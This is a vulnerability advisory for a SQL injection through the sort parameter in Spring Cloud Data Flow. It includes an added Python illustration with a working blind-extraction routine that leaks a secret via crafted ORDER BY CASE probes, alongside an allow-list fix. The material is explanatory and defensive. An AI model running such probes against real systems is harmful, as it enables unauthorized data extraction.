CVE-2020-5427: Possibility of SQL Injection in Spring Cloud Data Flow Task Execution Sorting Query
Severity
Medium
Vendor
Spring by VMware
Description
In Spring Cloud Data Flow versions 2.6.x prior to 2.6.5 and versions 2.5.x prior to 2.5.4, an application is vulnerable to SQL injection when task executions are requested with a caller-supplied sort parameter.
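The advisory names the class of bug (injection through a sort parameter) but not the pattern behind it. The following is an added illustration, not code from Spring Cloud Data Flow or from this advisory: a listing endpoint that splices a sort field into ORDER BY, a blind extraction that reads a value one character at a time purely from the order of the returned rows, and the allow-listed form that closes the hole. The table and column names (task_execution, app_credentials) and the sample rows are constructed for the example and are not SCDF's schema.

```python
import sqlite3

# Constructed sample data (not SCDF's schema): a listing table and a second
# table standing in for data the listing endpoint was never meant to expose.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE task_execution (task_execution_id INTEGER, task_name TEXT, exit_code INTEGER)"
    )
    conn.executemany(
        "INSERT INTO task_execution VALUES (?, ?, ?)",
        [(1, "timestamp-task", 0), (2, "import-task", 1), (3, "cleanup-task", 0)],
    )
    conn.execute("CREATE TABLE app_credentials (name TEXT, secret TEXT)")
    conn.execute("INSERT INTO app_credentials VALUES ('db', 'constructed-secret')")
    return conn


def list_executions_vulnerable(conn, sort_by, direction="ASC"):
    # Vulnerable pattern: the sort field goes straight into the statement.
    # Bind parameters cannot carry an identifier, so ORDER BY is a classic
    # place for string concatenation to survive code review.
    sql = (
        "SELECT task_execution_id, task_name FROM task_execution "
        f"ORDER BY {sort_by} {direction}"
    )
    return conn.execute(sql).fetchall()


ALPHABET = "abcdefghijklmnopqrstuvwxyz-"


def leak_secret_via_sort_order(conn, length):
    # Blind extraction through the vulnerable sort parameter: each probe is an
    # ORDER BY expression that sorts ascending by id when the guessed character
    # is right and descending when it is wrong, so the id of the first row
    # returned answers a yes/no question about the secret.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            probe = (
                f"(CASE WHEN (SELECT substr(secret, {pos}, 1) FROM app_credentials) = '{ch}' "
                "THEN task_execution_id ELSE -task_execution_id END)"
            )
            rows = list_executions_vulnerable(conn, probe)
            if rows[0][0] == 1:
                recovered += ch
                break
    return recovered


# Hardened pattern: the caller chooses from a fixed vocabulary of sort keys
# and the server maps each key to a column name it controls; the direction
# is restricted to the two literal tokens SQL accepts.
SORTABLE_COLUMNS = {
    "id": "task_execution_id",
    "name": "task_name",
    "exit": "exit_code",
}


def list_executions_hardened(conn, sort_by, direction="ASC"):
    column = SORTABLE_COLUMNS.get(sort_by)
    if column is None:
        raise ValueError(f"unsupported sort field: {sort_by!r}")
    direction = direction.upper()
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = (
        "SELECT task_execution_id, task_name FROM task_execution "
        f"ORDER BY {column} {direction}"
    )
    return conn.execute(sql).fetchall()


def hardened_rejects(conn, sort_by):
    # True when the hardened listing refuses the given sort field.
    try:
        list_executions_hardened(conn, sort_by)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("normal listing:", list_executions_vulnerable(db, "task_name"))
    print("leaked via sort order:", leak_secret_via_sort_order(db, 18))
    print("hardened listing:", list_executions_hardened(db, "name", "desc"))
    print("hardened rejects probe:", hardened_rejects(db, "(SELECT 1)"))
```

The point of the extraction routine is that an ORDER BY injection needs no error message and no UNION: the attacker only needs to observe which row comes first. That is why the fix is an allow-list of server-chosen column names rather than escaping, since there is no quoting that turns an arbitrary expression into a safe identifier.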
Affected VMware Products and Versions
Severity is medium unless otherwise noted.
Because Spring Cloud Data Flow is typically hosted internally for an operations team and not exposed as a public-facing service, the risk is assessed as medium (based on the CVSS score).
- Spring Cloud Data Flow
  - 2.6.x
  - 2.5.x
Mitigation
Users of affected versions should upgrade to a release in their line that contains the fix: 2.6.x users to 2.6.5 or later, 2.5.x users to 2.5.4 or later. Releases that have fixed this issue include:
- Spring Cloud Data Flow
  - 2.7.0
  - 2.6.5
  - 2.5.4
Credit
This issue was identified and responsibly reported by Sufijen Bani from CHECK24 Factory GmbH.
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5427
- https://github.com/spring-cloud/spring-cloud-dataflow/releases/tag/v2.7.0
- https://github.com/spring-cloud/spring-cloud-dataflow/releases/tag/v2.6.4
History
2020-12-01: 2.7.0 Release with fix
2020-11-24: Release Fix for 2.6.x line
2020-10-30: Initial vulnerability identified.